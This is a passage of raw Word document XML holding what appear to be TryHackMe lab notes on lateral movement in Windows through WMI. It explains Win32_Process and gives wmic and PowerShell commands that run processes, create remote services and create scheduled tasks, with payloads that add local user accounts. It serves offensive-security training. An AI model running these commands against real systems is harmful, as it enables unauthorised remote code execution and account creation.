          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CommandLine = $Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F8EADE" w14:textId="30573D1D"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noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F09AD6" w14:textId="77777777" w:rsidR="004571C3" w:rsidRDefault="004571C3" w:rsidP="004571C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A286219" w14:textId="3DD5E0AA" w:rsidR="007C71E3" w:rsidRDefault="004571C3" w:rsidP="004571C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004571C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-CimMethod: </w:t>
      </w:r>
      <w:r w:rsidRPr="004571C3">
        <w:t xml:space="preserve">This cmdlet is used to call a method on a </w:t>
      </w:r>
      <w:r w:rsidRPr="004571C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIM</w:t>
      </w:r>
      <w:r w:rsidRPr="004571C3">
        <w:t xml:space="preserve"> (Common Information Model) class. It allows us to interact with WMI (Windows Management Instrumentation) remotely, which is key for executing commands or managing resources on remote systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D91F55" w14:textId="0258F7D5" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Win32_Process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893C57C" w14:textId="77777777" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve">It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>built-in WMI class</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> in Windows that represents </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a running process</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> — like cmd.exe, explorer.exe, notepad.exe, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C1C70" w14:textId="77777777" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:r w:rsidRPr="00611434">
        <w:t>Think of it like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ABA7DD" w14:textId="77777777" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> Win32_Process is like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blueprint</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> for processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53A572" w14:textId="77777777" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> It contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> (like process ID, name, path, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FEF049" w14:textId="08FA3892" w:rsidR="00611434" w:rsidRPr="00611434" w:rsidRDefault="00611434" w:rsidP="00611434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> It also has </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> you can call — and one of the most useful is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t xml:space="preserve"> Create() — which </w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>starts a new process</w:t>
      </w:r>
      <w:r w:rsidRPr="00611434">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DF498" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29"/>
    <w:p w14:paraId="7E229386" w14:textId="581499C7" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>On legacy systems using wmic from cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D3739" w14:textId="4C4E97CE" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t xml:space="preserve">wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CD04B0" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29"/>
    <w:p w14:paraId="110B02B7" w14:textId="24A6746B" w:rsidR="00B45E29" w:rsidRPr="00990322" w:rsidRDefault="00B45E29" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating Services Remotely with WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559EB652" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C54048" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t>135/TCP, 49152-65535/TCP (DCERPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3FD17D" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:t>5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51547F40" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:t> Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DCBFE0" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29"/>
    <w:p w14:paraId="4471C7FB" w14:textId="5C11CC70" w:rsidR="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:r>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E457C45" w14:textId="0278637B" w:rsidR="004668D1" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:r w:rsidRPr="00B45E29">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B45E29">
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>THMService2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:t xml:space="preserve"> with WMI through PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E184377"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E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E0E567"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 xml:space="preserve">Name = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"THMService2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD6A9A"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 xml:space="preserve">DisplayName = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"THMService2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F42AE"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 xml:space="preserve">PathName = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"net user munra2 Pass123 /add"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="8292A2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Your payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DD18C"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ServiceType = [byte]::Parse(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"16"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="8292A2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Win32OwnProcess : Start service in a new process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CCB483"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 xml:space="preserve">StartMode = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Manual"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935D876"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B04090" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00B45E29"/>
    <w:p w14:paraId="642A97C0" w14:textId="01E35257" w:rsidR="004668D1" w:rsidRDefault="00B45E29" w:rsidP="00B45E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:t xml:space="preserve">tart </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and stop </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00C307FB">
        <w:t xml:space="preserve"> (get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C307FB">
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C307FB">
        <w:t xml:space="preserve"> instance from WMI created services first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83C18A"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F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Service = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Get-CimInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -ClassName Win32_Service -</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="66D9EF"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Name LIKE 'THMService2'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA48DE4"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p>
    <w:p w14:paraId="22E45DF7" w14:textId="77777777" w:rsid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E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -InputObject $Service -MethodName StartService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214B486"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p>
    <w:p w14:paraId="041F4390"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E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -InputObject $Service -MethodName StopService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F9E57" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E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B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -InputObject $Service -MethodName Delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6DBD7" w14:textId="77777777" w:rsidR="00B45E29" w:rsidRPr="00B45E29" w:rsidRDefault="00B45E29" w:rsidP="00B45E29"/>
    <w:p w14:paraId="4FCF569B" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00990322" w:rsidRDefault="00C307FB" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating Scheduled Tasks Remotely with </w:t>
      </w:r>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4DC566" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389ABBFD" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C307FB">
        <w:t>135/TCP, 49152-65535/TCP (DCERPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A9BF9" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C307FB">
        <w:t>5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE68BD" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required Group Memberships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:t> Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D55F4" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307FB"/>
    <w:p w14:paraId="2505CE70"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r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="8292A2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Payload must be split in Command and Args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD6172"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r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Command = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64204C8C"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r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Args = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"/c net user munra22 aSdf1234 /add"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462573B2"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p>
    <w:p w14:paraId="25D44F87"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r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$Action = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>New-ScheduledTaskAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
